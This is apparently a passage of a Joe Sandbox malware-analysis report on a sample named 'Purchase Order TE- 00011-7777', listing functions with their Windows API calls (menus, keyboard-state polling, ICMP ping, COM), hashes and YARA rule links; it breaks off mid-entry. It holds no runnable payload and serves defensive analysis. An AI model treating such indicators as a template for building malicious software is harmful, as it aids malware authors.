                      • Instruction ID: 6fcf69bc7bd0e0dd8f97ca67333c733cd485e2b07de5f74ec0e9661f49b631ec
                      • Opcode Fuzzy Hash: 6b63100cc59268745834d93ee9fbb202fb1c2c5cffcf428f852ba944a044b262
                      • Instruction Fuzzy Hash: 2851FE71B00209AFDB18CF69DD95FAEBBBAEB88710F55813DB919D7294DB709D008B10
                      Function 00AAB86E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A94954,00000000), ref: 00A94A23
                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00AAB85B), ref: 00AAB926
                      • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00AAB85B,00000000,?,?,00AAAF1E,?,?), ref: 00AAB9BD
                      • DestroyAcceleratorTable.USER32(00000000), ref: 00B0E775
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AAB85B,00000000,?,?,00AAAF1E,?,?), ref: 00B0E7A6
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AAB85B,00000000,?,?,00AAAF1E,?,?), ref: 00B0E7BD
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AAB85B,00000000,?,?,00AAAF1E,?,?), ref: 00B0E7D9
                      • DeleteObject.GDI32(00000000), ref: 00B0E7EB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                      • String ID:
                      • API String ID: 641708696-0
                      • Opcode ID: f14faf17e85f8adc116ef6a43db8d98730972bafb36b21e4af73d8b2825f806f
                      • Instruction ID: 975c35db9def75b381faea0bdf4cd17fcc6458f55315c7954b316980201fad28
                      • Opcode Fuzzy Hash: f14faf17e85f8adc116ef6a43db8d98730972bafb36b21e4af73d8b2825f806f
                      • Instruction Fuzzy Hash: A8619A31110701CFDB369F29D988B26BBF5FB4A312F108999E196876B1CB75EC80CB60
                      Function 00AAB039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AAB155: GetWindowLongW.USER32(?,000000EB), ref: 00AAB166
                      • GetSysColor.USER32(0000000F), ref: 00AAB067
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ColorLongWindow
                      • String ID:
                      • API String ID: 259745315-0
                      • Opcode ID: b4f4b6bf40a6c56e0b7f231c3bdee06a772b0bcddab49e1727c32cc87fd19141
                      • Instruction ID: a485e3a5f886ef23ec1acc4990d8f4fb4ead4cabeb5d046483aef30a7bf4c493
                      • Opcode Fuzzy Hash: b4f4b6bf40a6c56e0b7f231c3bdee06a772b0bcddab49e1727c32cc87fd19141
                      • Instruction Fuzzy Hash: 34418B31110540EFDB209F28D888BBA3BA6EB06721F5883A5FD759B1E6DB318C51DB31
                      Function 00AD7334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                      • String ID:
                      • API String ID: 136442275-0
                      • Opcode ID: 0bd2634d20cbe216c568df56b4f9526b55fb8a77f28eb727e6861d91c415e63b
                      • Instruction ID: 89e1a5289ca5bc7aab68ea743458d9590e850fb7731a013be5e3c3410f16893f
                      • Opcode Fuzzy Hash: 0bd2634d20cbe216c568df56b4f9526b55fb8a77f28eb727e6861d91c415e63b
                      • Instruction Fuzzy Hash: 6A41FCB290416CAADF25EB50CD55EDE73BCAB08310F5041E7F519A2152EB71ABD4CFA0
                      Function 00A984A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                      Download Yara Rule
                      APIs
                      • __swprintf.LIBCMT ref: 00A984E5
                      • __itow.LIBCMT ref: 00A98519
                        • Part of subcall function 00AB2177: _xtow@16.LIBCMT ref: 00AB2198
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __itow__swprintf_xtow@16
                      • String ID: %.15g$0x%p$False$True
                      • API String ID: 1502193981-2263619337
                      • Opcode ID: c9d01060394d01cd2f6b2f72cfe57f1d5a5838cb36eeabd9e2a6966ba12b3afb
                      • Instruction ID: 796bb3d382b71750a5c6ad137088d0aa093243d3aa54504798f98f4f54d8c555
                      • Opcode Fuzzy Hash: c9d01060394d01cd2f6b2f72cfe57f1d5a5838cb36eeabd9e2a6966ba12b3afb
                      • Instruction Fuzzy Hash: 6C41DF71600605ABDF34DB38DD82FAA7BE9EF45310F2044AAE54AD7292EA35DA41CB10
                      Function 00AB5C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00AB5CCA
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      • __gmtime64_s.LIBCMT ref: 00AB5D63
                      • __gmtime64_s.LIBCMT ref: 00AB5D99
                      • __gmtime64_s.LIBCMT ref: 00AB5DB6
                      • __allrem.LIBCMT ref: 00AB5E0C
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AB5E28
                      • __allrem.LIBCMT ref: 00AB5E3F
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AB5E5D
                      • __allrem.LIBCMT ref: 00AB5E74
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AB5E92
                      • __invoke_watson.LIBCMT ref: 00AB5F03
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                      • String ID:
                      • API String ID: 384356119-0
                      • Opcode ID: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                      • Instruction ID: a1602f9cdbcb11fd03974639339bb939078e6aa04981ff8923c7137fb6a0a753
                      • Opcode Fuzzy Hash: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                      • Instruction Fuzzy Hash: A071E872E01B16ABE714EF79CD81BEA77BDAF11364F144229F510D7682E770DA408B90
                      Function 00AD57FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00AD5816
                      • GetMenuItemInfoW.USER32(00B518F0,000000FF,00000000,00000030), ref: 00AD5877
                      • SetMenuItemInfoW.USER32(00B518F0,00000004,00000000,00000030), ref: 00AD58AD
                      • Sleep.KERNEL32(000001F4), ref: 00AD58BF
                      • GetMenuItemCount.USER32(?), ref: 00AD5903
                      • GetMenuItemID.USER32(?,00000000), ref: 00AD591F
                      • GetMenuItemID.USER32(?,-00000001), ref: 00AD5949
                      • GetMenuItemID.USER32(?,?), ref: 00AD598E
                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AD59D4
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AD59E8
                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AD5A09
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                      • String ID:
                      • API String ID: 4176008265-0
                      • Opcode ID: a8d6c71cbd8b37aa77e8dc8183050aa81876593f2aa6f94da96f0d3e3d18ddd6
                      • Instruction ID: 33a8e1c4d150121a17755e4e17e5527ed78cb17477df499fa212698cdce5c19f
                      • Opcode Fuzzy Hash: a8d6c71cbd8b37aa77e8dc8183050aa81876593f2aa6f94da96f0d3e3d18ddd6
                      • Instruction Fuzzy Hash: 9A61AC70D00659EFDB11CFB8C998EAE7BB9EB01358F18455AE442A7351DB30AD01DB20
                      Function 00AF9A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AF9AA5
                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AF9AA8
                      • GetWindowLongW.USER32(?,000000F0), ref: 00AF9ACC
                      • _memset.LIBCMT ref: 00AF9ADD
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AF9AEF
                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AF9B67
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$LongWindow_memset
                      • String ID:
                      • API String ID: 830647256-0
                      • Opcode ID: 892920e34cf7c5dbe76546c2863798152a61ff8bdc16f7a7175b5e8828b48b9c
                      • Instruction ID: 53484656457c26fc191d5c04df2eeb9a2ca965cc0abfc53b7b88b6ab0703f50b
                      • Opcode Fuzzy Hash: 892920e34cf7c5dbe76546c2863798152a61ff8bdc16f7a7175b5e8828b48b9c
                      • Instruction Fuzzy Hash: CB614975A00208AFDB21DFA8CD81FEE77F8AB09710F104599FA15E72A2D770AD46DB50
                      Function 00AD3569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • GetKeyboardState.USER32(?), ref: 00AD3591
                      • GetAsyncKeyState.USER32(000000A0), ref: 00AD3612
                      • GetKeyState.USER32(000000A0), ref: 00AD362D
                      • GetAsyncKeyState.USER32(000000A1), ref: 00AD3647
                      • GetKeyState.USER32(000000A1), ref: 00AD365C
                      • GetAsyncKeyState.USER32(00000011), ref: 00AD3674
                      • GetKeyState.USER32(00000011), ref: 00AD3686
                      • GetAsyncKeyState.USER32(00000012), ref: 00AD369E
                      • GetKeyState.USER32(00000012), ref: 00AD36B0
                      • GetAsyncKeyState.USER32(0000005B), ref: 00AD36C8
                      • GetKeyState.USER32(0000005B), ref: 00AD36DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: State$Async$Keyboard
                      • String ID:
                      • API String ID: 541375521-0
                      • Opcode ID: eb95dffd3b1d11d6cd926c5ffae6410b3a62a8b57478826a95378b0ec6e8b026
                      • Instruction ID: 764e3bd28951d172ff046c1f5162df1d5ec82a8dec5379d273004bc8465f93df
                      • Opcode Fuzzy Hash: eb95dffd3b1d11d6cd926c5ffae6410b3a62a8b57478826a95378b0ec6e8b026
                      • Instruction Fuzzy Hash: F8419F65508BC97DFF319B6498143A6BEA16B21344F48805BD5C7463C2EBA4DBC8CBA3
                      Function 00ACA28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                      Download Yara Rule
                      APIs
                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00ACA2AA
                      • SafeArrayAllocData.OLEAUT32(?), ref: 00ACA2F5
                      • VariantInit.OLEAUT32(?), ref: 00ACA307
                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00ACA327
                      • VariantCopy.OLEAUT32(?,?), ref: 00ACA36A
                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00ACA37E
                      • VariantClear.OLEAUT32(?), ref: 00ACA393
                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00ACA3A0
                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ACA3A9
                      • VariantClear.OLEAUT32(?), ref: 00ACA3BB
                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ACA3C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                      • String ID:
                      • API String ID: 2706829360-0
                      • Opcode ID: 611cd44ed4cc0a0e004bee08d3f6af88c4718e53c7523a3d1af768d5e7c4a096
                      • Instruction ID: 5b354315057889538a1dfebf72d322530e9abfa039a84683d9d7dd166f600eec
                      • Opcode Fuzzy Hash: 611cd44ed4cc0a0e004bee08d3f6af88c4718e53c7523a3d1af768d5e7c4a096
                      • Instruction Fuzzy Hash: 10414D3590021DEFCB01DFA8D994EEEBBB9FF48304F518069E501A7361DB34AA45CBA1
                      Function 00AEB250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                      • CoInitialize.OLE32 ref: 00AEB298
                      • CoUninitialize.OLE32 ref: 00AEB2A3
                      • CoCreateInstance.OLE32(?,00000000,00000017,00B1D8FC,?), ref: 00AEB303
                      • IIDFromString.OLE32(?,?), ref: 00AEB376
                      • VariantInit.OLEAUT32(?), ref: 00AEB410
                      • VariantClear.OLEAUT32(?), ref: 00AEB471
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                      • API String ID: 834269672-1287834457
                      • Opcode ID: 2777bdbaaab398dd94abe10ad7a0de639e8a2ce090b11b8e61a8954c047e85b7
                      • Instruction ID: 8e8c95bb155cb16ad3a574b8200bc6ff475bb561e7a269b4e86a372ae3cafa7f
                      • Opcode Fuzzy Hash: 2777bdbaaab398dd94abe10ad7a0de639e8a2ce090b11b8e61a8954c047e85b7
                      • Instruction Fuzzy Hash: 20619C70214342AFC710DF55C989BAFB7E8AF89714F10481DF9859B2A1CB70EE44CBA2
                      Function 00AE8694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                      Download Yara Rule
                      APIs
                      • WSAStartup.WSOCK32(00000101,?), ref: 00AE86F5
                      • inet_addr.WSOCK32(?), ref: 00AE873A
                      • gethostbyname.WSOCK32(?), ref: 00AE8746
                      • IcmpCreateFile.IPHLPAPI ref: 00AE8754
                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AE87C4
                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AE87DA
                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00AE884F
                      • WSACleanup.WSOCK32 ref: 00AE8855
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                      • String ID: Ping
                      • API String ID: 1028309954-2246546115
                      • Opcode ID: 4c7e270c6fbb41a622bdf862bd28eb80f7e83a6fe046dc3c1c3a533d23b8ccf4
                      • Instruction ID: 0fa5f7a048b40ca4ed7188891a1d9e0b14622d9b873882f5fa4230e536be546f
                      • Opcode Fuzzy Hash: 4c7e270c6fbb41a622bdf862bd28eb80f7e83a6fe046dc3c1c3a533d23b8ccf4
                      • Instruction Fuzzy Hash: 3351B3316042019FDB10DF25CD85B6ABBE4EF49760F54892AF95ADB2A1DF34EC00CB51
                      Function 00AF9C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00AF9C68
                      • CreateMenu.USER32 ref: 00AF9C83
                      • SetMenu.USER32(?,00000000), ref: 00AF9C92
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF9D1F
                      • IsMenu.USER32(?), ref: 00AF9D35
                      • CreatePopupMenu.USER32 ref: 00AF9D3F
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AF9D70
                      • DrawMenuBar.USER32 ref: 00AF9D7E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                      • String ID: 0
                      • API String ID: 176399719-4108050209
                      • Opcode ID: 4747c9e05a74463689cd2435ce1d400d5466a5d57792674793267b66a4ad90c5
                      • Instruction ID: 4cacd6525c8e505eda44a3de60ef162a2b3ade8fb592c59d17d2e846f37098bd
                      • Opcode Fuzzy Hash: 4747c9e05a74463689cd2435ce1d400d5466a5d57792674793267b66a4ad90c5
                      • Instruction Fuzzy Hash: 6E413775A00209EFDB21EFA8D844BEA7BB6FF49314F244428FA4597351DB30A910CF61
                      Function 00ADEC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00ADEC1E
                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00ADEC94
                      • GetLastError.KERNEL32 ref: 00ADEC9E
                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00ADED0B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Error$Mode$DiskFreeLastSpace
                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                      • API String ID: 4194297153-14809454
                      • Opcode ID: 1631212588ec888ce1bed2624ff65cb12e15bf83036cc042ae4d57070c93972d
                      • Instruction ID: b50fe1ed9d7f8d2d94a44bb2ea18a5337ad8c0ab39bb06b9b487170e7c0ae41f
                      • Opcode Fuzzy Hash: 1631212588ec888ce1bed2624ff65cb12e15bf83036cc042ae4d57070c93972d
                      • Instruction Fuzzy Hash: 46319E35A00209AFCB10EB64C989AAEB7F4EF44B10F148067F502EF3A1DA719A41CBD1
                      Function 00ACC6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00ACC782
                      • GetDlgCtrlID.USER32 ref: 00ACC78D
                      • GetParent.USER32 ref: 00ACC7A9
                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ACC7AC
                      • GetDlgCtrlID.USER32(?), ref: 00ACC7B5
                      • GetParent.USER32(?), ref: 00ACC7D1
                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ACC7D4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$CtrlParent$_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 313823418-1403004172
                      • Opcode ID: 615569f2439b8cf5f8dfabcd73e6959da1b8044f4061a53acb2d09b91e4d6d03
                      • Instruction ID: 63740fff61a59554118d9803afd497935f8058d54aeaad6255095481bdc7d1e0
                      • Opcode Fuzzy Hash: 615569f2439b8cf5f8dfabcd73e6959da1b8044f4061a53acb2d09b91e4d6d03
                      • Instruction Fuzzy Hash: ED21AF74A00208BFDF05EBA4CC86EFEBBB5EB46310F504119F566972E1DB785916AB20
                      Function 00ACC7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                      Download Yara Rule
                      APIs
